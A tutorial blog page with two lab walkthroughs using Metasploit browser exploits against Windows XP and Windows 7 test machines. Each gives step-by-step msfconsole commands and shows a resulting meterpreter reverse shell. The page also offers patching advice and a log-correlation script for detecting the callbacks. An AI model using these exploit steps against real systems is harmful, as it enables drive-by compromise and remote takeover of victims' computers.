metalkey

Hacking tutorials + info

Metasploit Browser Autopwn – Windows XP SP3

July 01, 2016 — metalkey
Attacker: Kali Linux
Victim: Windows XP SP3 (Java 6u25, IE6)

Step 1 – Starting the Browser Autopwn Server

Run msfconsole, load the browser_autopwn module and set all required options.

root@kali:~$ msfconsole
msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > set LHOST 192.168.1.12
msf auxiliary(browser_autopwn) > set SRVPORT 80
msf auxiliary(browser_autopwn) > set URIPATH /
msf auxiliary(browser_autopwn) > run

[*] Starting exploit modules on host 192.168.1.12...
[*] Server started.

The Browser Autopwn server is now running and waiting for victims to browse to the URL http://192.168.1.12/. Note that it binds port 80, so nothing else may be listening there on the Kali box.

Step 2 – Pwning the Victim

On your Windows XP test machine (victim), browse to http://192.168.1.12.
browser_autopwn fingerprints the browser and its plugins and serves only the exploits that match, then launches a meterpreter session when one of them succeeds. The module starts a separate reverse handler per payload type (LPORT_WIN32, LPORT_JAVA and so on); the session below arrives on port 7777, the default Java handler port, which means it was the Java 6u25 plugin rather than IE6 itself that got exploited.

[*] Meterpreter session 1 opened (192.168.1.12:7777 -> 192.168.1.13:1045) at 2015-07-25 05:08:06 -0400
...
msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\IEUser\Desktop>echo %USERNAME%
Victim

C:\Documents and Settings\IEUser\Desktop>ipconfig
Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : Home
IP Address. . . . . . . . . . . . : 192.168.1.13
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1

C:\Documents and Settings\IEUser\Desktop>

You now have shell access to the Windows XP SP3 victim with the same privileges as the user who navigated to the exploit URL (no privilege escalation has taken place; if that user is a local administrator, so are you).

Solution

Keep your software fully updated (Windows, web browsers, Java and other browser plugins) and uninstall applications you do not use. Windows XP, IE6 and Java 6 no longer receive security fixes at all, so a machine like this victim should be retired rather than patched.

Tags: metasploit

Metasploit Adobe Flash 18.0.0.203 Exploit – Windows 7 / Windows 8.1

July 01, 2016 — metalkey
Attacker: Kali Linux
Victim: Windows 7 Enterprise 32-bit (Adobe Flash Player 18.0.0.203, Firefox 39)

Step 1 – Starting the Exploit Server

Run msfconsole, load the adobe_flash_opaque_background_uaf module and set all required options. The payload handler uses the default LPORT 4444 (the session below shows it), so that port must be reachable from the victim.

root@kali:~$ msfconsole
msf > use exploit/multi/browser/adobe_flash_opaque_background_uaf
msf exploit(adobe_flash_opaque_background_uaf) > set SRVPORT 80
msf exploit(adobe_flash_opaque_background_uaf) > set URIPATH /
msf exploit(adobe_flash_opaque_background_uaf) > exploit
[*] Local IP: http://192.168.1.12:80/
[*] Server started.

Step 2 – Exploiting the Victim Machine

On your Windows test machine (victim), start Firefox and browse to http://192.168.1.12.
The server sends a malicious SWF that triggers the adobe_flash_opaque_background_uaf exploit in the Flash plugin and launches a meterpreter session.

[*] 192.168.1.11 adobe_flash_opaque_background_uaf - Sending SWF...
[*] Sending stage (885806 bytes) to 192.168.1.11
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.11:49297) at 2015-08-01 04:39:34 -0400
msf exploit(adobe_flash_opaque_background_uaf) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: IE8Win7\IEUser
meterpreter > ls
Listing: C:\
============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2013-10-23 12:22:56 -0400 $Recycle.Bin
40777/rwxrwxrwx 0 dir 2009-07-14 00:53:55 -0400 Documents and Settings
40777/rwxrwxrwx 0 dir 2009-07-13 22:37:05 -0400 PerfLogs
40555/r-xr-xr-x 0 dir 2015-08-01 03:32:42 -0400 Program Files
40777/rwxrwxrwx 0 dir 2015-08-01 03:32:42 -0400 ProgramData
40777/rwxrwxrwx 0 dir 2013-10-23 12:22:42 -0400 Recovery
40777/rwxrwxrwx 0 dir 2014-11-26 14:57:05 -0500 System Volume Information
40555/r-xr-xr-x 0 dir 2013-10-23 12:22:47 -0400 Users
40777/rwxrwxrwx 0 dir 2013-10-23 17:52:20 -0400 Wallpaper
40777/rwxrwxrwx 0 dir 2015-08-01 03:20:08 -0400 Windows
100777/rwxrwxrwx 24 fil 2009-06-10 17:42:20 -0400 autoexec.bat
100666/rw-rw-rw- 10 fil 2009-06-10 17:42:20 -0400 config.sys
100666/rw-rw-rw- 1073741824 fil 2015-08-01 04:01:24 -0400 pagefile.sys
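Seen from the victim's network, both tutorials on this page leave the same trace: a workstation fetches a page from a host it has never talked to, and a few seconds later the same workstation opens an outbound TCP connection to that same host on a non-web port (7777 in the Browser Autopwn post, 4444 in the Flash post). The script below, an added example that is not part of the original posts, correlates a web-proxy log with a firewall connection log to flag that pattern. The log formats, the sample lines, the 30-second window and the set of "web" ports are all constructed assumptions for the example; the timestamps and addresses simply mirror the two session lines above.

```python
"""Flag drive-by exploitation followed by a reverse-TCP callback.

Added example, not code from the original posts. Correlates two constructed
logs: a web proxy log (who fetched what) and a firewall log (who connected
where). An alert is raised when a client connects to a non-web port on a host
from which it fetched a page shortly before.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Constructed sample logs (assumed format: "<iso-ts> <client> <method> <url> <status>").
PROXY_LOG = """\
2015-07-25T05:08:01-04:00 192.168.1.13 GET http://192.168.1.12/ 200
2015-07-25T05:08:03-04:00 192.168.1.14 GET https://intranet.example/home 200
2015-08-01T04:39:30-04:00 192.168.1.11 GET http://192.168.1.12/ 200
2015-08-01T04:39:31-04:00 192.168.1.11 GET http://192.168.1.12/ 200
"""

# Constructed sample log (assumed format: "<iso-ts> <action> TCP <src>:<sport> -> <dst>:<dport>").
FIREWALL_LOG = """\
2015-07-25T05:08:06-04:00 ALLOW TCP 192.168.1.13:1045 -> 192.168.1.12:7777
2015-07-25T05:08:04-04:00 ALLOW TCP 192.168.1.14:1050 -> 192.168.1.1:443
2015-08-01T04:39:34-04:00 ALLOW TCP 192.168.1.11:49297 -> 192.168.1.12:4444
2015-08-01T04:45:00-04:00 ALLOW TCP 192.168.1.11:49300 -> 192.168.1.12:4444
"""

WEB_PORTS = {80, 443, 8080}          # assumption: ports we treat as ordinary browsing
WINDOW = timedelta(seconds=30)       # assumption: how soon after the page fetch a callback counts

PROXY_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")
FW_RE = re.compile(r"^(\S+) (\w+) TCP (\S+):(\d+) -> (\S+):(\d+)$")


def parse_proxy(text):
    """Map (client_ip, server_host) -> list of request timestamps."""
    requests = defaultdict(list)
    for line in text.splitlines():
        m = PROXY_RE.match(line)
        if not m:
            continue                               # skip lines that do not fit the format
        ts, client, _method, url, _status = m.groups()
        host = urlsplit(url).hostname
        requests[(client, host)].append(datetime.fromisoformat(ts))
    return requests


def parse_firewall(text):
    """Yield (timestamp, src_ip, dst_ip, dst_port) for each TCP connection."""
    conns = []
    for line in text.splitlines():
        m = FW_RE.match(line)
        if not m:
            continue
        ts, _action, src, _sport, dst, dport = m.groups()
        conns.append((datetime.fromisoformat(ts), src, dst, int(dport)))
    return conns


def find_callbacks(proxy_text, fw_text, window=WINDOW):
    """Return alerts for non-web connections that follow a page fetch of the same host."""
    requests = parse_proxy(proxy_text)
    alerts = []
    for ts, src, dst, dport in parse_firewall(fw_text):
        if dport in WEB_PORTS:
            continue                               # ordinary browsing, not a callback
        # Only requests that happened before the connection and within the window count.
        deltas = [ts - req for req in requests.get((src, dst), [])
                  if timedelta(0) <= ts - req <= window]
        if deltas:
            alerts.append({
                "client": src,
                "server": dst,
                "port": dport,
                "seconds_after_request": int(min(deltas).total_seconds()),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_callbacks(PROXY_LOG, FIREWALL_LOG):
        print("possible exploit callback:", alert)
```

Run against the constructed logs this flags the two sessions from the posts and ignores the HTTPS connection and the late 04:45 connection outside the window. The obvious caveat is that the check keys on the destination port: a reverse_https payload calling back on 443 to the same host blends into the "web" set and would need a different signal (for example a TLS connection with no matching proxy request, or a page that served a JAR or SWF from a bare IP).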

Solution

Uninstall Flash Player. If you cannot, update it: the use-after-free this module exploits (CVE-2015-5122) was fixed in Flash Player 18.0.0.209, and running Firefox with the plugin set to "ask to activate" (click-to-play) stops a SWF from loading silently from a page you merely visited.

Tags: metasploit